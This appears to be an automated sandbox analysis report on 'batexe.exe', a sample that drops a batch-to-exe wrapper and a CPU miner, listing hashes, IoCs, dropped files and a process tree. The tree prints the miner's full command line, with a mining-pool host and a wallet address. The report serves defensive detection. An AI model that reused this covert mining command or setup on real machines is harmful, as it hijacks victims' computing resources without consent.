73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
300s
platform
windows10-1703_x64
resource
win10-20240214-ja
resource tags

arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
23/02/2024, 18:11

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
3764	b2e.exe
2000	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2000	cpuminer-sse2.exe
2000	cpuminer-sse2.exe
2000	cpuminer-sse2.exe
2000	cpuminer-sse2.exe
2000	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/5068-6-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 5068 wrote to memory of 3764	5068	batexe.exe	74
PID 5068 wrote to memory of 3764	5068	batexe.exe	74
PID 5068 wrote to memory of 3764	5068	batexe.exe	74
PID 3764 wrote to memory of 4288	3764	b2e.exe	75
PID 3764 wrote to memory of 4288	3764	b2e.exe	75
PID 3764 wrote to memory of 4288	3764	b2e.exe	75
PID 4288 wrote to memory of 2000	4288	cmd.exe	78
PID 4288 wrote to memory of 2000	4288	cmd.exe	78

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:5068
- C:\Users\Admin\AppData\Local\Temp\D3AB.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\D3AB.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\D3AB.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3764
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\D699.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4288
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2000

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\D3AB.tmp\b2e.exe

Filesize
3.1MB

MD5
6a97999f73a6d98056201bf2962127b2

SHA1
f7a8aad280d4283d70d6e448c873ac55e48b34b2

SHA256
80fbdb7ef43e06757160458d50ca4eeaa9b77c2f4b273cfcf0bdbc2d34fab408

SHA512
fd6efc180e636063815ddcbf8cbd34f8a862b6ad769f5fe2bb4530bd450f35fd017e460c874ef438ef03f6405e1b972934a50e0791d7cb3c33f7d6d8bf947fe6

Download Submit
C:\Users\Admin\AppData\Local\Temp\D3AB.tmp\b2e.exe

Filesize
3.7MB

MD5
75ff8486f8f2336b3a57c904123d2bcc

SHA1
2a708606e05c3e5b37870552dc199fde8986d3fb

SHA256
4ff85130eaa0a09715970f27b6f6f287690d1ac020e3c9ac6c6845f98a79b267

SHA512
7a31efc463917bc7bcccce4455bbb9b6c573da3067d0a7531ff6795596af5507be015081f36bc780cff831800b34da010bdd9d25415c997f3f9bf3b15ccac1b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\D699.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
521KB

MD5
2983d7ca508f209bc785d622508dc248

SHA1
290e18a36560d36de79df47a0c5d200ed6e30890

SHA256
24da11174bd900f3e2498e2bc90ed3b38ce0c5acdf003458ad6e34fd3c863f1f

SHA512
cbaee979a59db956186fd4fc8426638a907037036c17f16da486680f899efadf3534d2915d5ec55b2baa526fff283f51656dfe889262689bc29adc8c1884ea56

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
379KB

MD5
e163682305f4b7abff0b090f3fa6df6e

SHA1
9d0feead705a5833fbe075de5ef8d5c2bbeffba6

SHA256
92f0eb820654f18e7b4acad860c94b9b9ec3581e97471fba4f22af1cb22661a6

SHA512
50147b4055a49a66c99d5b7bf33256ac014ef8e4d5b3a77216df5523687a584c6e9cf699339d799c99b3ee975bef5cafdebbd30f93ebb2f28701c4136f9cd437

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
276KB

MD5
c108caac2b8975401b5fe18151f14090

SHA1
e0d3f40fbaf9a072cecd00bdfbbef1bf8951c21b

SHA256
08385373d06f8954cf255afdf1834457199c5e8f8c5b48bf357190edb4856208

SHA512
5cca6ab54174702d838dbf6fda7c952f2ab1ad23a0472f9eb827b02350e0e8757f6429e01fdf1169a63bd698a2813590761db8087c808bfd67452ac127fc26aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
689KB

MD5
a38c393a5d471e28d34a282461862ce4

SHA1
57e31ae8c000b009d17e72a951c1cd7b221c2bec

SHA256
7bf90756ac19c43434c8fafaa7054a7742d6aa4c5b3451fc138c846557bbb405

SHA512
0388d6c5433bc0219f3a5415e5e4040089a994511060aa05a18c809c8864ddebf3b821b79b708d3c312f5a9b559024fab24da887a76d26113383e3c1eab63e9c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
409KB

MD5
131b7e94c9e034e536975e19a0cf632d

SHA1
a9514a903128f9e501e2ee4ec2f39271a17b8b58

SHA256
bc5233b69751f80c938bd4b34bb40711485d356ca68e2b2cd44e4b34e0111905

SHA512
e9dcf7d14b36295de8c93c71eebb3806b0775da19897f947b99b8d8b6b2eaa91343f94a1f68e07dd38002c32fe9675f39eb77b7c4b4aff2b5240297d3aba4919

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
447KB

MD5
62bb140ffefec3702ebc64a93489181e

SHA1
178e38f7cfd55f96b7aafa3b56cb352adf988dc9

SHA256
16873ea523ef8067d2d43d214e408c8fa0f0b684e46b9df02deb0b8e3802772d

SHA512
d9dfc4e21fd1749c9a792506157925bdeb76fa7aaa97ba60cc1ad671a8887830e4dfebac0589e8fb775fcc7c19882062f140157be0db0e670d749df31e785f04

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
283KB

MD5
f131c34759d2a3a08358866120056cb7

SHA1
675d32f947d49cfbd2e5dbd16f61778c1453be1f

SHA256
4d2eda025bab5845a0952439135900b3279500bb374c9eab9b061bd5d1d93ba9

SHA512
f4a764269d9d64d9480248b1994f2c029f326cf6c89555dd8960254279fe5599498536de0379be670f10636fc20dd5ee68512b4fdfec1128fa84a47544130793

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
130KB

MD5
0b3695241df707b32c302042681fd41a

SHA1
3980b4711b9f962f33f944c591684127e33e74a9

SHA256
0d868d13c526292ef4d994384e5abec5049c8f7875d432477bff217b5d03f717

SHA512
367111a84f96f7660c872d70a396a3129ed14de44cfe5266aade219510879ce4345379e1537cac78ecf2cd20494c32b447c08dd28fab44719c1e9c198c05f099

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
374KB

MD5
c90ae49e980e71c6e820ad50fb0bda7a

SHA1
fcbc2ba0e4bcaf1634e4e565142d8a32a9d96dcc

SHA256
0cec428b97c653cc3c0af4c9c5c47dee76b8b4804db2ce86e84726da7c6a9474

SHA512
cdf74c5ba46d3688ec7d05d6a88508448438b9f94601e09bd7b248fac5391f24327ab5adc5cb52d44ca20bfab66af61d48495c64e95ef0f0482ac6ddbbb71709

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
522KB

MD5
660d6af97a39e4ee121bebbc0fd182f0

SHA1
d36fb87c0c177e74de8e24dee4479b2e1e8ec758

SHA256
a20803e78e61c902d839f6602928d7d3701220381f679f6aee93bcb026d70d64

SHA512
de51ef4340224cf636989bed3fcd8ddc79bfa6510a450762f4c9e2cb1c0f78b0b45f035a430b53ba0d1d39f1555b4c1996f7833381509b32574a2c7be9e96f1f

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
535KB

MD5
cbafaada033b2a1409dfbca74089413c

SHA1
eabc21a1c79f02a7f91ac6c8fdd1d17b3a570eb3

SHA256
9e1b811fc2a563786d4b584309905400d3e8ae3eae41b7319cf0e43503d40590

SHA512
5f7f148d773f6be57ac7bf723d32c7d95517419de8b9d47769a1788a30b7a0274cc87ae55c5ac96269ea94258a0497e7304738c901c727c0829df9aa0b700db7

Download Submit
memory/2000-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2000-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2000-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2000-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2000-42-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2000-43-0x0000000069FA0000-0x000000006A038000-memory.dmp

Filesize
608KB

Download
memory/2000-44-0x0000000001090000-0x0000000002945000-memory.dmp

Filesize
24.7MB

Download
memory/2000-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2000-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2000-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2000-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2000-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2000-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2000-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2000-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2000-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3764-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3764-5-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/5068-6-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download